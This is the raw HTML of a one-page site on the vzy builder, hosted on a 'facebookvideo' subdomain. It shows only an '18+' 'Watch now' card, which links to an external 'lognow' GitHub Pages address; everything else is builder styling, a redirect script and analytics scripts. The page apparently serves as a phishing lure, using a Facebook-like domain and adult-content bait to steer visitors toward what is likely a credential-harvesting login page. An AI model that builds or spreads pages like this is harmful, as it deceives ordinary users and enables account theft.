

<!DOCTYPE html>
<html lang="en" data-theme=none>

<head>
    <meta charset="utf-8">
    <meta http - equiv="X-UA-Compatible" content="IE=edge">
    <meta name="title" content="Watch now ">
    <title>Watch now </title>
    <meta name="description" content="18+">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0">
    

    <!-- Open Graph / Facebook -->
    <meta property="og:type" content="website">
    <meta property="og:url" content="https://facebookvideo.vzy.io">
    <meta property="og:title" content="Watch now ">
    <meta property="og:description" content="18+">
    <meta property="og:image" content="https://sitefile.co/65b27c4746a8c8629e87dff5/1706196213285_20240125_143950.png">

    <!-- Twitter -->
    <meta property="twitter:card" content="summary_large_image">
    <meta property="twitter:url" content="https://facebookvideo.vzy.io">
    <meta property="twitter:title" content="Watch now ">
    <meta property="twitter:description" content="18+">
    <meta property="twitter:image" content="https://sitefile.co/65b27c4746a8c8629e87dff5/1706196213285_20240125_143950.png">

    <link rel="icon" type="image/svg" href="https://app.vzy.co/assets/icons/favicon.svg" />
    <link rel="preconnect" href="https://fonts.gstatic.com">


    <link rel="stylesheet" type="text/css" href="https://app.vzy.co/assets/css/vzy_v1.css">
    <link rel="mask-icon" href="https://app.vzy.co/assets/icons/favicon.svg" color="#808080">
    <script src="https://unpkg.com/@phosphor-icons/web"></script>
    <style lang="css">
		#preloader{
			display: flex;justify-content:center;align-items:center; flex-direction:column;
			height:100vh;width: 100vw;
			position: fixed; z-index: 100;top: 0px;left: 0px;
			background: var(--background);
			opacity: 1;
            text-align:center;
            padding:50px;
		}
		#preloader.done{
			opacity: 0;
			transition: 1s ease;
		}
        @font-face {
            font-family: "Inter Bold";
            src: url("https://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuFuYMZhrib2Bg-4.ttf");
        }
        @font-face {
            font-family: "Inter regular";
            src: url("https://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyfMZhrib2Bg-4.ttf");
        }
	</style>

    <script>
    var currentURL = window.location.href;
    var targetDomain = "undefined";
    // console.log('undefined', 'currentUrl: ', currentURL, 'targetDomain: ', targetDomain, !currentURL.includes(targetDomain))
    if ('undefined' && targetDomain !== 'undefined' && !currentURL.includes(targetDomain)) {
        if (!targetDomain.startsWith("https://")) {
            targetDomain = "https://" + targetDomain;
        }

        var currentRoute = window.location.pathname;
// console.log(currentRoute.length);
        if (currentRoute.length > 0) {
            var newURL = targetDomain + currentRoute;
            // console.log(newURL);
            window.location.replace(newURL);
        }
    }
    </script>

    
    </head>

<body>
    <!--Container -->
    <div class="container">
<!--[--><!--[--><div id="preloader"><!----><!--[--><img src="https://sitefile.co/65b27c4746a8c8629e87dff5/1706196421541_image_search_1703587857862.png" style="height: var(--logo-height)" alt="website logo" class="site-logo light"><img src="https://sitefile.co/65b27c4746a8c8629e87dff5/1706196421541_image_search_1703587857862.png" style="height: var(--logo-height)" alt="website logo" class="site-logo dark"><!--]--></div><!--]--><div class="navbar-box fixed shadow w-fit" style="--logo-height:20px;"><div class="navbar header-box"><!----><div class="header-1 w-boxed"><div class="desktop-nav"><header><nav><div class="icon-link"><a href="/" class="logo"><!--[--><img src="https://sitefile.co/65b27c4746a8c8629e87dff5/1706196421541_image_search_1703587857862.png" style="height: 20px" alt="website logo" class="site-logo light"><img src="https://sitefile.co/65b27c4746a8c8629e87dff5/1706196421541_image_search_1703587857862.png" style="height: 20px" alt="website logo" class="site-logo dark"><!--]--><!----></a><!----></div><ul class="nav__list"><!--[--><!--]--></ul></nav><div class="button-holder"><!----><!----><ul class="theme-button"><li class="dark-mode" style="display:none;"><a href="javascript:void(0)" name="dark-theme"><svg width="24" height="25" viewBox="0 0 24 25" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M12.958 2.34399C14.6372 5.52163 14.103 9.4162 11.6303 12.0244C9.1576 14.6326 5.29704 15.3735 2.03442 13.8661C2.83817 19.0086 7.44338 22.6807 12.6357 22.3195C17.828 21.9583 21.8804 17.6838 21.9644 12.4797C22.0483 7.27549 18.136 2.87253 12.958 2.34399Z" stroke="var(--foreground)" stroke-linecap="square"></path></svg></a></li><li class="light-mode" style="display:none;"><a href="javascript:void(0)" name="light-theme"><svg width="26" height="26" viewBox="0 0 26 26" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M4.51468 4.85875L6.21174 6.55581M19.7882 20.1323L21.4852 21.8293M19.7882 6.55581L21.4853 4.85875M4.51471 21.8293L6.21177 20.1322M13 1.34399V3.744M13 22.944L13 25.344M22.6 13.344L25 13.344M1 13.344H3.4" stroke="var(--foreground)" stroke-linecap="square"></path><path d="M8 13.344C8 10.5826 10.2386 8.34399 13 8.34399C15.7614 8.34399 18 10.5826 18 13.344C18 16.1054 15.7614 18.344 13 18.344C10.2386 18.344 8 16.1054 8 13.344Z" stroke="var(--foreground)"></path></svg></a></li><!----></ul><!----></div></header></div></div><!----><!----><!----><div class="mobile-nav" style="--logo-height:20px;"><header><div class="icon-link"><a href="/" class="logo t-3"><!--[--><img src="https://sitefile.co/65b27c4746a8c8629e87dff5/1706196421541_image_search_1703587857862.png" alt="website logo" class="site-logo light"><img src="https://sitefile.co/65b27c4746a8c8629e87dff5/1706196421541_image_search_1703587857862.png" alt="website logo" class="site-logo dark"><!--]--><!----></a><!----></div><!----></header><div class="mobile-nav-overlay bordered"><div class="header-nav"><nav><ul><!--[--><!--]--></ul></nav><div class="button-holder"><!----><!----><!----></div></div></div></div></div></div><div class="spacer"></div><!--]--><div class="banner-box new box section-bg-wrapper
    left" id="banner-1"><section class="w-boxed min-shape section-content"><div class="banner-box section-bg-wrapper  transparent	color     min-shape" style="--bg-color:--accent;--spacingTB:calc(var(--unit) * 8);--spacingLR:calc(var(--unit) * 2);"><div class="min-shape inner-content section-container"><!----><!----><!----><div class="banner-layout-3 w-boxed"><div class="banner section-component"><div class="full banner-text content-heading" style=""><!----><h1 class="t-7 title pre-line"></h1><p class="t-2 pre-line subtitle-width-size subtitle" data-size="50" style="width:50%"></p><!----><!----></div><!----></div></div><!----><!----><!----><!----><span id="successMessage" style="display:none;">Thank you! Your submission has been received</span></div></div></section><!----><!----></div><div class="card-box box  transparent color    section-height-fit section-width-fill undefined" style="--bg-color:;--bg-accent-color:;overflow:visible;--spacingTB:calc(var(--unit) * 5);--spacingLR:calc(var(--unit) * 2);" id="cards"><div style="--image-height:200px;--image-height-mobile:250px;" class="inner-content"><!----><div class="card-2 center w-boxed false" style="padding-bottom:0px!important;"><!----><div class="card-container compat__2 col-1"><!----></div><div class="card-container col-1"><!--[--><div class="hover-state min-shape card" style=""><a href="https://lognow.github.io/In/" target="" name="card-link" class="bottom"><div class="min-shape glass card-text"><!----><div class="description"><p class="t-0 pre-line">Watch now </p></div><!----><!----></div><div class="card-image min-shape" style="height:var(--image-height);"><!--[--><img src="https://sitefile.co/65b27c4746a8c8629e87dff5/1706196213285_20240125_143950.png" alt="" style="height:var(--image-height);"><!--]--></div><!----><!----></a><!----></div><!--]--></div></div></div><!----></div><!--[--><div class="footer-1 box v_2-footer" style="--logo-height:20px;"><div class="footer-card w-boxed"><div class="footer-top"><div class="footer-top__nav-container"><!----><!----></div><div class="footer-top__content-container"><!----><!----><div class="footer-buttons__holder v_2-footer" style=""><!----><!----><!----></div></div></div><!----></div><svg style="display:none;"><symbol id="plus" width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M12 5V19" stroke="var(--foreground)"></path><path d="M5 12H19" stroke="var(--foreground)"></path></symbol></svg></div><!----><!----><!--]--><div
    style="
        background: var(--foreground);
        padding: 8px 12px;
        width: auto;
        position: fixed;
        bottom: 10px;
        right: 10px;
        border-radius: 3px;
        display: flex;
        align-items: center;
        z-index: 99999;
    "
>
    
  <style>
  :root {
    --sublinks-shape: var(--min-shape);
    --logo-height: 50px;
    --logo-height-mobile: 20px;
    --site-width: 1000px;
    --accent: var(--foreground);
    --shape: var(--r-small);
    --min-shape: var(--min-r-small);
    --design-headFont: 'Inter Bold';
    --design-headWeight: 100;
    --design-bodyFont: 'Inter regular';
    }
    button{
      background:var(--foreground)!important;
    }
    h1:not(.block-card), h2:not(.block-card), h3:not(.block-card), .mobile-nav-overlay .link__a, a.logo span, #preloader span, .billing-price .amount, .head-font {
      font-family:'Inter Bold'!important;
      font-weight:100!important;
    }
    p:not(.block-card),input,input::placeholder, .share-box-content, .mobile-nav-overlay a, textarea, h3.t-1.small-size, .display-options .display-style li, .pricing-benefits li, .price-title span, .body-font {
      font-family:'Inter regular'!important;
    }
    header>nav>ul>li>a, button, .page-list, .navbar-box .sub-link{
      font-family:'Inter regular'!important;
    }
    .footer-card ul>li>a, .footer-card .footer-bottom>.footer-bottom-right>a, .announcement-bar-block > a{
      font-family:'Inter regular'!important;
    }
    button,  .pricing-box .pricing-container-small .pricing-section > .tier.popular-price > .pricing-details > a button{
      color:var(--background)!important;
    }

    h1{
      letter-spacing:-0.04em!important;
    }
    h2{
      letter-spacing:-0.02666666666666667em!important;
    }
    h3{
      letter-spacing:-0.02em!important;
    }
    .logo-text {
      letter-spacing: -0.04em !important;
    }
    @media screen and (min-width: 1200px) {
      .w-boxed{
        max-width:1000px!important;
      }
    }
    @media screen and (max-width: 768px) {
      .w-boxed{
        width: 100%;
        max-width: 100%;
      }
    }
</style>

		    <p id="siteUrl" data-siteUrl="65b27c4746a8c8629e87dff5"></p>
        </div>
    </body>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/3.12.4/gsap.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/3.12.4/Observer.min.js"></script>
    <script src="https://app.vzy.co/assets/js/allCountries.js" defer></script>
    <script src="https://app.vzy.co/assets/js/vzy.js" defer></script>
    <script src="https://app.vzy.co/assets/js/tracker.js"></script>
    <script>
        ackeeTracker.create('https://analytics.vzy.co',{
            detailed: true,
            ignoreLocalhost: true
        }).record('6700429a-5198-4f04-af4c-9a756fcd925f')
    </script>
    <script async src="//cdn.iframe.ly/embed.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js" integrity="sha256-/H4YS+7aYb9kJ5OKhFYPUjSJdrtV6AeyJOtTkw6X72o=" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.8/js/intlTelInput.min.js"></script>
    
</html>
